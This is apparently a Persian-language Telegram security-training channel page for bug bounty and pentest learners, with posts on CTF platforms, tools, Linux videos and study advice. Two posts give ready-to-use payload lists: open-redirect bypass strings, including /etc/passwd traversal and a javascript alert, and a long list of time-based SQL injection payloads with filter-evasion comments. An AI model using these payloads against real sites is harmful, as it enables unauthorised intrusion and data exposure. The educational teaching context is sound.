Security hint – Telegram
Security hint
4.67K subscribers
75 photos
2 videos
18 files
190 links
🔥Security training

🎯 قراره روشن کننده مسیرتون باشیم.

یوتیوب: www.youtube.com/@sec_hint

اپارات: aparat.com/sec_hint

گیت‌هاب: https://github.com/sechint

ادمین:
@adm_sec_hint
Download Telegram
💡 ترفندهای موثر برای بای‌پس Open Redirect
اگه با Open Redirect سر و کار داری، این ترفندها می‌تونن بهت کمک کنن تا بای‌پس‌های موثری ایجاد کنی:

1. تزریق Null-byte

- /google.com%00/
- //google.com%00


2. رمزگذاری Base64

- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/


3. تغییر حساس به حروف بزرگ و کوچک

- //GOOGLE.com/
- //GoOgLe.com/


4. رشته‌های UTF-8 بیش از حد طولانی

- %C0%AE%C0%AE%2F
- %C0%AF%C0%AF%2F%2Fgoogle.com


5. روش‌های ترکیبی رمزگذاری

- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D


6. روش‌های مختلف نوشتن دامنه

- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/


7. کاراکترهای خاص در انتها
- //google.com/#/
- //google.com/;&/


8. فرمت هشت‌گانه آدرس IP

- http://0177.0.0.1/
- http://00177.0000.0000.0001/


9. انواع آدرس‌های IP
- http://3232235777
- http://0xC0A80001


10. مسیر‌یابی با رمزگذاری
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd


11. استفاده از پروتکل‌های جایگزین

- ftp://google.com/
- javanoscript:alert(1)//google.com


12. آدرس‌های پروتکل نسبی

- :////google.com/
- :///google.com/


13. موارد لبه در ریدایرکت‌ها

- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/


14. نوشتار IPv6

- http://[::1]/
- http://[::ffff:192.168.1.1]/


15. دو بار رمزگذاری آدرس URL

- %252f%252fgoogle.com
- %255cgoogle.com


16. ترکیب مسیردهی و رمزگذاری

- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd


17. ردیابی DNS معکوس

- https://google.com.reverselookup.com
- //lookup-reversed.google.com/


18. پورت‌های غیرمعمول

- http://google.com:81/
- https://google.com:444/


19. مبهم‌سازی مسیر با Unicode
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/


20. مبهم‌سازی پارامترهای Query

- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/


21. استفاده از نماد @ برای userinfo

- https://admin:password@google.com/
- http://@google.com


22. ترکیب userinfo و مسیردهی

https://admin:password@google.com/../../etc/passwd



#OpenRedirect #BugBounty #PenTesting #CyberSecurity

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
16👍5
🧐تا حالا خواستین IP تون لو نره؟
چیکار کردین براش⁉️
دوست داشتید توی کپشن بنویسید‼️

در این مورد هم یک ویدیو توی یوتیوب گذاشتم😏
#YouTube #Fake_IP

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍104
🚀جدیدترين و سریعترين DNS Resolver 🚀

یه ابزار فوق‌العاده به نام SanicDNS توسط Hadrian معرفی شده که می‌تونه ۵ میلیون درخواست DNS در ثانیه رو پردازش کنه! 😲
سرعت این DNS Resolver خیلی بیشتر از ابزارهای قدیمی مثل MassDNS هست و به‌خاطر عملکرد فوق‌العاده سریعش در پردازش و پاسخ به درخواست‌ها، می‌تونه برای تست‌های امنیتی و عملکرد شبکه مفید باشه. ⚡️

🔗 جزئیات بیشتر و دریافت:
SanicDNS در GitHub

#DNS #SanicDNS #CyberSecurity #Pentesting #BugBounty
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍14🤩3
🎞اگر تا حالا با SQLmap کار نکردید یا نمیدونید از UNION attack چطوری میشه استفاده کرد پیشنهاد میکنم ویدیو این هفته چنل یویتوب رو حتما ببینید😍

https://youtu.be/J9iYUNX3TV4?si=hcI-N772KvH3MlSe

#Youtube #sqlmap #sql_injection

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥13👍4
سلام به همراهان عزیزم😍
برای ادامه مسیر خوشحال میشم باهم تعامل داشته باشیم چه در کپشن اینجا چه در کامنت های یوتیوب، برام بنویسید و بگید:
چقدر براتون این ویدیو ها مفید بوده🤩
از چه چیزی خوشتون اومده و دوست داشتید و از چه چیزی خوشتون نیومده 🤔

و مثل همیشه مرسی که هستید❤️
23👍2
🚨 Time-Based SQL Injection Payloads 🚨

این لیست شامل Payload‌های مختلف برای اجرای حملات SQL Injection با استفاده از تأخیر زمانی است. این روش به شما کمک می‌کند تا آسیب‌پذیری‌های زمان‌محور را در دیتابیس‌های مختلف مثل MySQL، PostgreSQL و MSSQL شناسایی کنید.

🔹 چند نمونه از Payloadها:

timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
...

⚠️ توجه: تمامی payloadها را برای تست امنیتی هدفمند استفاده کنید و از آن‌ها در محیط‌های قانونی بهره ببرید.

#SQLi #Injection #TimeBased #Security

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
12👍5👎1🤩1
🎯معرفی پلتفرم های CTF بر اساس سطح سختی 🎯

🟢 مبتدی:
🔗 picoCTF
🔗 TryHackMe
🔗 CTFlearn
🔗 Hacker101 CTF
🔗 LegitBS
🔗 OverTheWire
🔗 Crackmes.one
🔗 CyberTalents
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟡 سطح متوسط:
🔗 TryHackMe
🔗 Flare-On
🔗 CTFtime
🔗 Pwn College
🔗 OWASP WebGoat
🔗 PentesterLab
🔗 CMD Challenge
🔗 Hacksplaining
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🔴 پیشرفته:
🔗 Hack The Box
🔗 root-me 🌟🌟
🔗 VulnHub 🌟🌟
🔗 Exploit Exercises
🔗 PortSwigger Web Security 🌟🌟
🔗 Challenges.re
🔗 CryptoHack
🔗 CryptoPals
🔗 Rubiya CTF
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟣 حرفه‌ای:
🔗 UnderTheWire
🔗 AttackDefense
🔗 FBCTF GitHub Archive
🔗 Awesome CTF GitHub
🔗 Awesome CTF Resources GitHub
🔗 Guy in a Tuxedo GitHub
🔗 Pwn.tn
🔗 SmashTheStack
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

با هر سطحی که باشی، یکی از این پلتفرم‌ها حتماً به کارت میاد! 🚀

#CTF #امنیت_سایبری #آموزش

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍166🔥2👏1
🚨 CSP Bypass - Content Security Policy (CSP) 🚨

🌐 سایت CSP Bypass مرجع عالی برای محققان امنیت، توسعه‌دهندگان و کارشناسان تست نفوذ است تا با روش‌های دور زدن CSP آشنا شوند. CSP یکی از راه‌های مهم برای جلوگیری از حملات XSS است، اما اگر به درستی پیکربندی نشود، قابل دور زدن است.

🔧 با یادگیری تکنیک‌های مختلف و بررسی سناریوهای عملی، می‌توانید ضعف‌های پیکربندی CSP را شناسایی کنید


#CSP #امنیت #XSS #Bypass
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
6👍3
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎

و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️

🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟

الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو


https://youtu.be/alxPYBMWzIc?si=D5lZ3IyC5bzq7ZDO

#YouTube #Linux
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
12👍2🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 اکستنشن کروم برای استخراج اندپوینت‌ها و URLها از فایل‌های جاوااسکریپت 🔍

🔗 و Extractifyیه اکستنشن جذاب برای کرومه که به طور خودکار اندپوینت‌ها و URLها رو از فایل‌های جاوااسکریپت پیدا می‌کنه. 📂 ویژگی خاص این ابزار اینه که دائم روی DOM سایت نظارت داره؛ یعنی اگر یه فایل جاوااسکریپت جدید به DOM اضافه بشه، بلافاصله اون رو اسکن و اطلاعات مورد نیاز رو استخراج می‌کنه.

🔧 مناسب برای تست نفوذ روی سایت‌های مدرن مثل SPAها (مثل Next.js، React و ...)

#BugBounty #ChromeExtension #JavaScript #SPA

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
14👍5👎1
Security hint
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎 و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️ 🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟ الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو https://youtu.be/alxPYBMWzIc?si…
🎞 ویدیو امروزمون در مورد کامند های ابتدایی و کار با فایل ها در لینوکس هست. یکی از موارد مهم که باید بدونید تا خروجی ابزار های مختلف باگ بانتی و پنتست رو بتونید مدیریت کنید😉

فقط یکم طولانی شده چون خواستم تک تک دستورات رو بررسی کنم و این سه تا موضوعی ک امروز گفتم به هم نزدیک تر بودن 😇

حمایت میکنید بزارم یوتیوب؟!😍

YouTube
13👍3👎1💯1
🚀منابع یادگیری Regex برای پنتستر و باگ‌بانتی‌

Regex یا Regular Expressions در پنتستینگ و باگ‌بانتی کاربرد بسیاری داره؛ از جمله برای پیدا کردن الگوهای مشخص در داده‌ها، استخراج اطلاعات حساس، و شناسایی الگوهای آسیب‌پذیری. اگر Regex رو درست یاد بگیرید، می‌تونید با دقت بیشتری اسکن و تحلیل کنید.

این سه منبع برتر می‌تونند توی یادگیری شما مفید باشند:

1.ا Learn Regex در GitHub - آموزش‌های منظم و ساده
2.ا RegexOne - تمرینات قدم‌به‌قدم
3.ا RegexLearn - منابع تعاملی و کاربردی

هرکدوم از این منابع برای تمام سطوح مناسبه و بهتون کمک می‌کنه سریع‌تر الگوها رو شناسایی و استخراج کنید. 📊

#Regex #Source

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
12👍3
🥇اولین نقاط بررسی در پنتست یک سایت

وقتی یک سایت رو برای پنتست باز می‌کنید، اولین نقاطی که باید چک بشه شامل نقاط ورودی و عملکردهای کلیدی هست. این نقاط می‌تونند زمینه آسیب‌پذیری‌های رایجی باشن که دسترسی یا کنترل غیرمجاز رو امکان‌پذیر می‌کنند:
✔️Register

✔️Login

✔️Upload Functionality

✔️Search Box

✔️Comment & Feedback Section

✔️Contact Us Form

✔️GET & POST Request

✔️Cookies and Import Functions

#Checklist #تست_نفوذ

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
15👍8
🔥 نکات کلیدی برای شروع یادگیری Web Pentest

🔺درک آسیب‌پذیری‌ها: وقت بذارید تا جزئیات هر آسیب‌پذیری، نحوه شکل‌گیری و خطرات و نحوه اکسپلویت اون رو کاملاً بشناسید.

🔺بررسی کدهای نمونه: با تجزیه‌وتحلیل کدهای آسیب‌پذیر، شناخت عمیق‌تری از نحوه بروز آسیب‌پذیری‌ها پیدا می‌کنید.

🔺بدون کپی‌کردن پیلودها: از پیلودها به‌درستی و با درک کامل استفاده کنید.صرفا حفظ نکنید یا وردلیست داشته باشید و تست کنید. وقتی کامل درک کنید پیلود های بهتری هم میتونید بسازید

🔺یادداشت‌برداری کنید: از مطالبی که میخونید و لابراتوار هایی ک حل میکنید حتما یادداشت برداری کنید اینطوری میتونید متدولوژی خودتون رو بسازید و اگر چیزی یادتون رفت سرگردون نشید

🔺جستجو: یکی از اصلی ترین کار ها ریسرچ و جستجو کردن درمورد مشکلی هست که بهش برمیخورید نه اینکه مستقیم سولوشن (راه حل) رو ببینید

🔺از منابع معتبر استفاده کنید: منابع مفیدی مثل PayloadsAllTheThings و HackTricks رو همیشه در دسترس داشته باشید و از گوگل هم کمک بگیرید.

#starter #advice
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍114🤩1
سلام سلام. حالتون چطوره؟!
میبینم 3k ای شدیم😍... مبارکمون باشه🎉

به همین مناسبت قراره یه برنامه خفنی رو باهم شروع کنیم😏

کی دوست داره کتاب
Browser Networking
رو بخونه؟!

انشالله که نویسنده کتاب شکایت نمیکنه🥲


یا دوست دارید یه کتاب دیگه ای شروع کنیم؟


ریکشن هاتون رو ببینم تا شرایط اش رو بگم 😍

@Sec_Hint
👍51🔥6🤩1
و چون درخواست کرده بودید برای نوشن لینوکس اون رو اینجا میزارم ☺️
Notion linux

#Notion #Linux

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍15🔥1
اگه هنوز عضو گروهمون نشدید از لینک زیر بیا داخل:
https://news.1rj.ru/str/Sec_Hint_chat